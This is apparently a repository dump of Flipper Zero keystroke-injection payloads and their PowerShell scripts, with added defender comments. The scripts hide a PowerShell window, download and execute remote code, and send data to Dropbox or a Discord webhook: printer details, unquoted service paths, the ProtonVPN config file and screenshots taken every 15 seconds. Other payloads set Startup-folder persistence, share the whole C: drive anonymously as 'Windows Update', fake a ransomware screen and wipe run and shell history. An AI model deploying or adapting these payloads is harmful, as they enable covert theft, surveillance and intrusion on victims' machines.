# An emptied RunMRU key or a missing PSReadLine history file can itself be treated as an indicator.
# empty temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
# Report file in the temp directory, named <user>-<timestamp>_PrinterDriver.txt.
$F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt"
# Records name, type, driver name, shared flag and location of every printer Get-Printer returns.
Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1
# Sends the report out, then runs the cleanup; the temp-folder wipe in Clean-Exfil would
# normally cover this report file as well.
# Defender view: a Get-Printer listing written to %TEMP% and followed by an outbound upload from
# PowerShell is the observable sequence; keeping print drivers patched limits the value of the data.
DropBox-Upload -f $F1
Clean-Exfil
================================================
FILE: FlipperZero/payloads/Printer-Recon/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Printer+Recon!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Printer-Recon
## Description
This payload is meant to exfiltrate printer information for further social engineering or driver exploitation. It can also be used to find printer web interfaces on the network.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Printer-Recon/payload.txt
================================================
REM Title: Printer-Recon
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver exploitation. Can also be used to find printer web interfaces on the network
REM Target: Windows 10
REM Defender note: this stage only types a Run-dialog command that starts a hidden PowerShell with
REM -ep Bypass, downloads a script with iwr and executes it with iex. Alerting on powershell.exe
REM started from the Run dialog with these switches, script block logging and USB HID device
REM control are the relevant defences.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Priv-Paths/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Priv+Paths!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Priv-Paths
## Description
A payload to enumerate unquoted service paths for privilege escalation and send them to a Discord webhook.
## Getting Started
### Dependencies
* Discord Webhook or other service that uses webhooks
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Command will be entered in the command prompt to search for unquoted service paths so you can later exploit them for priv esc
```
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Priv-Paths/payload.txt
================================================
REM Title: Priv-Paths
REM Author: atomiczsec
REM Description: A payload to enumerate unquoted service paths for privilege escalation and send to a discord webhook.
REM Target: Windows 10
REM Put your discord webhook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky
REM Defender note: the wmic/findstr pipeline lists auto-start services whose binary path is outside
REM C:\Windows and contains no double quote. The list is saved as p.txt in the user's home directory,
REM posted to a webhook with curl.exe and then deleted. Quoting service ImagePath values and denying
REM non-administrators write access to the directories on those paths removes the weakness being
REM searched for; a cmd.exe session that chains wmic service, curl.exe -F "file=@..." and del is the
REM behaviour to alert on.
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 500
STRING cd %HOMEPATH%
ENTER
DELAY 1000
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
ENTER
DELAY 1000
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
ENTER
DELAY 200
STRING del p.txt
ENTER
DELAY 100
STRING exit
ENTER
================================================
FILE: FlipperZero/payloads/Proton-Hog/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Proton-Hog
A payload to exfiltrate the user config file of Proton VPN, which contains keys and usernames as well as account information.
## Description
This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file
Then dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Proton-Hog/payload.txt
================================================
REM Title: Proton-Hog
REM Author: atomiczsec
REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as account information.
REM Target: Windows 10
REM Defender note: the only action here is a Run-dialog command that launches a hidden PowerShell
REM (-w h -NoP -NonI -ep Bypass) and runs a downloaded script through iex. Command-line auditing,
REM script block logging and blocking unapproved USB HID devices address this stage; if it is seen
REM on a host, treat the VPN client credentials stored for that user as exposed.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Proton-Hog/s.ps1
================================================
function DropBox-Upload {
<#
.SYNOPSIS
Uploads one local file to the root of the Dropbox account tied to the embedded access token.
.PARAMETER SourceFilePath
Path of the file to send (alias -f); also accepted from the pipeline.
.NOTES
Defender view: this is the exfiltration step, one HTTPS POST from PowerShell to
content.dropboxapi.com. Because the destination is a legitimate cloud service, logging which
process made the request is more telling than the domain. The bearer token is kept in the script
in clear text, so a recovered copy can help identify the receiving account and be reported to the
provider for revocation.
#>
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
# Only the file name is kept, so the upload lands at "/<name>" in the remote account.
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# Upload options ("mode": "add", "autorename": true) travel in the Dropbox-API-Arg header.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is the request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Test the path to the ProtonVPN directory and, if it is available, change directory to where the user.config is stored
# Defender view: the script reads the VPN client's per-user settings under
# %USERPROFILE%\AppData\Local\ProtonVPN and uploads the file named user.config. The repository's
# README describes that file as holding keys and usernames (not verifiable from this script), so an
# unexpected read or upload of it should lead to rotating the affected VPN credentials.
if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) {
try {
# Only a console message is produced when the client folder is absent.
Write-Host "The VPN folder has not been found. "
}
catch {
throw $_.Exception.Message
}
}
else {
$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN"
cd $protonVpnPath
# Descend into the child whose name matches "ProtonVPN.exe", then into what that directory contains.
Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd
Get-ChildItem | cd
# Upload user.config to dropbox
DropBox-Upload -f "user.config"
}
================================================
FILE: FlipperZero/payloads/Pwn-Drive/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Pwn+Drive!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Pwn-Drive
A payload to share the victims "C:" drive to the network.
## Description
This payload will share the entire victims "C:" drive to the entire network for further exploitation.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Pwn-Drive/c.ps1
================================================
#Pwn-Drive
# Defender view: every step below weakens a host control rather than reading data, so the
# observable artefacts are configuration changes: netsh firewall rule changes, value writes under
# HKLM:\SYSTEM\CurrentControlSet\Control\Lsa and ...\Services\LanManServer\Parameters, and a new SMB
# share whose root is C:\. With file-share auditing enabled, share creation is recorded as Security
# event 5142. The HKLM writes and New-SmbShare normally require an elevated session, so users
# running without administrative rights limit the impact. Remediation is to remove the share
# (Remove-SmbShare), review the two registry keys for unexpected values and re-check the firewall
# rule groups. The share name looks chosen to resemble a system component (inferred from the name).
#Enable Network Discovery
netsh advfirewall firewall set rule group=”network discovery” new enable=yes
#Enable File and Print
netsh firewall set service type=fileandprint mode=enable profile=all
#Setting Registry Values for allowing access to drive without credentials
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force
#Sharing the Drive
New-SmbShare -Name "Windows Update" -Path "C:\"
================================================
FILE: FlipperZero/payloads/Pwn-Drive/payload.txt
================================================
REM Title: Pwn-Drive
REM Author: atomiczsec
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
REM Target: Windows 10
REM Defender note: this stage types one Run-dialog command that starts a hidden PowerShell with
REM -ep Bypass and executes a downloaded script through iex. Detection belongs at process creation
REM (powershell.exe with these switches) and in script block logging; prevention belongs in USB HID
REM device control and in keeping interactive users out of the local Administrators group.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/RanFunWare/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# RanFunWare
A payload to prank your friends into thinking their computer got hit with ransomware.
## Description
This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/RanFunWare/payload.txt
================================================
REM Title: RanFunWare
REM Author: atomiczsec
REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
REM Target: Windows 10
REM Defender note: the keystrokes open the Run dialog and start a hidden PowerShell with -ep Bypass
REM that downloads a script with iwr and runs it with iex. Nothing in this stage encrypts data, but
REM the delivery path is the same one a harmful script would use, so the same controls apply:
REM command-line and script block logging, and restricting unknown USB HID devices.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/RanFunWare/r.ps1
================================================
# Defender view: this part changes only the look of the current user's desktop. Observable
# artefacts are HideIcons = 1 under HKCU ...\Explorer\Advanced, an image fetched from an external
# URL into C:\temp\test.jpg, a C# type compiled at run time through Add-Type, and a wallpaper change
# made with SystemParametersInfo. Recovery is to set HideIcons back to 0 and restore the wallpaper.
#Hides Desktop Icons
$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1
# Stops the explorer process; presumably so the shell picks up the new setting when it comes back.
Get-Process "explorer"| Stop-Process
#Changes Background
#URL For the Image of your choice (Wanna Cry Ransomware Background)
$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg"
Invoke-WebRequest $url -OutFile C:\temp\test.jpg
# C# source for a small wrapper around user32!SystemParametersInfo; action 20 is the constant the
# wrapper names SetDesktopWallpaper, and the two flags are combined in the fuWinIni argument.
$setwallpapersrc = @"
using System.Runtime.InteropServices;
public class Wallpaper
{
public const int SetDesktopWallpaper = 20;
public const int UpdateIniFile = 0x01;
public const int SendWinIniChange = 0x02;
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
public static void SetWallpaper(string path)
{
SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);
}
}
"@
# Compiles the wrapper into the session, then points the wallpaper at the downloaded image.
Add-Type -TypeDefinition $setwallpapersrc
[Wallpaper]::SetWallpaper("C:\temp\test.jpg")
#Pop Up Message
function MsgBox {
<#
.SYNOPSIS
Shows a WPF message box and returns the value produced by [System.Windows.MessageBox]::Show.
.PARAMETER message
Text shown in the box (alias -m); mandatory.
.PARAMETER title
Window title (alias -t); a single space is used when omitted.
.PARAMETER button
Button set (alias -b): OK, OKCancel, YesNoCancel or YesNo; OK when omitted.
.PARAMETER image
Icon (alias -i): None, Hand, Question, Warning or Asterisk; None when omitted.
#>
[CmdletBinding()]
param (
[Parameter (Mandatory = $True)]
[Alias("m")]
[string]$message,
[Parameter (Mandatory = $False)]
[Alias("t")]
[string]$title,
[Parameter (Mandatory = $False)]
[Alias("b")]
[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
[string]$button,
[Parameter (Mandatory = $False)]
[Alias("i")]
[ValidateSet('None','Hand','Question','Warning','Asterisk')]
[string]$image
)
# WPF assemblies that provide System.Windows.MessageBox.
Add-Type -AssemblyName PresentationCore,PresentationFramework
# Fill in defaults for the optional parameters.
if (!$title) {$title = " "}
if (!$button) {$button = "OK"}
if (!$image) {$image = "None"}
[System.Windows.MessageBox]::Show($message,$title,$button,$image)
}
# Shows the scare message with a warning icon and OK/Cancel buttons. Defender view: the dialog is
# cosmetic, and nothing in this script encrypts or deletes files; responders can confirm that from
# the script text before treating the host as a ransomware case.
MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning
================================================
FILE: FlipperZero/payloads/Screen-Shock/I.bat
================================================
@echo off
REM Changes to the user's AppData\Roaming folder and runs c.ps1 from there in a hidden PowerShell
REM with the execution policy bypassed. The README states this file is placed in the Startup
REM folder so that c.ps1 runs again at every logon.
REM Defender note: a new .bat file in a user's Startup folder that launches PowerShell with
REM -w h and -Ep Bypass is a persistence indicator; autorun reviews and file-creation monitoring
REM on the Startup folder cover it.
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: FlipperZero/payloads/Screen-Shock/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Screen-Shock
This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds
The contents will then be sent to the DropBox for viewing pleasure
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Screen-Shock/c.ps1
================================================
function DropBox-Upload {
<#
.SYNOPSIS
Uploads one local file to the root of the Dropbox account tied to the embedded access token.
.PARAMETER SourceFilePath
Path of the file to send (alias -f); also accepted from the pipeline.
.NOTES
Defender view: this is the exfiltration step, one HTTPS POST from PowerShell to
content.dropboxapi.com per call. Repeated uploads at a fixed interval from a PowerShell process
stand out in proxy logs even though the destination is a legitimate service. The bearer token is
stored in clear text, so a recovered copy of the script can help identify the receiving account
and be reported to the provider for revocation.
#>
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
# Only the file name is kept, so the upload lands at "/<name>" in the remote account.
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# Upload options ("mode": "add", "autorename": true) travel in the Dropbox-API-Arg header.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is the request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Endless capture loop: one bitmap covering all monitors is saved to the user's Temp folder as
# <computername>-Capture.png, the loop sleeps 15 seconds, and the file is then uploaded.
# Defender view: the loop has no exit condition, so it runs until the PowerShell process ends.
# Indicators are a long-lived hidden powershell.exe that loads System.Windows.Forms and
# System.Drawing, the same PNG being rewritten in Temp, and an upload roughly every 15 seconds.
while(1){
Add-Type -AssemblyName System.Windows.Forms,System.Drawing
$screens = [Windows.Forms.Screen]::AllScreens
# Bounding rectangle of all screens: smallest top/left and largest right/bottom.
$top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
$left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
$width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
$height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
$bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
$bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
$graphics = [Drawing.Graphics]::FromImage($bmp)
# Copies the screen contents inside the bounding rectangle into the bitmap.
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
# Release the GDI+ objects before the next iteration.
$graphics.Dispose()
$bmp.Dispose()
start-sleep -Seconds 15
"$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
}
================================================
FILE: FlipperZero/payloads/Screen-Shock/payload.txt
================================================
REM Title: Screen-Shock
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Target: Windows 10
REM Defender note: the typed command writes two downloaded files to disk, l.bat in the user's
REM Startup folder and c.ps1 in %APPDATA%, then starts c.ps1. Unlike an in-memory stage this
REM leaves files behind: file-creation monitoring on the Startup folder, autorun reviews and a
REM search for c.ps1 in %APPDATA% locate it, and deleting both files plus ending the running
REM PowerShell process removes it.
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: FlipperZero/payloads/Screen-Shock/placeholder
================================================
================================================
FILE: FlipperZero/payloads/Spotify-Spy/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Spotify+Spy!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Spotify-Spy
This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
## Description
Have you ever been too afraid to ask your co-worker what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their Spotify username for you so you don't have to socially interact with anyone!
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Spotify-Spy/SS.ps1
================================================
#Spotify-Spy
# Lists the entries of the current user's Spotify "Users" directory into a text
# file and stages a copy of that file in the temp directory for upload.
# See if file is a thing
# (the True/False result is only written to the output stream; nothing below depends on it)
Test-Path -Path "$env:APPDATA\Spotify\Users"
# Create variable for file name: <username>-<timestamp>_spotify_users.txt
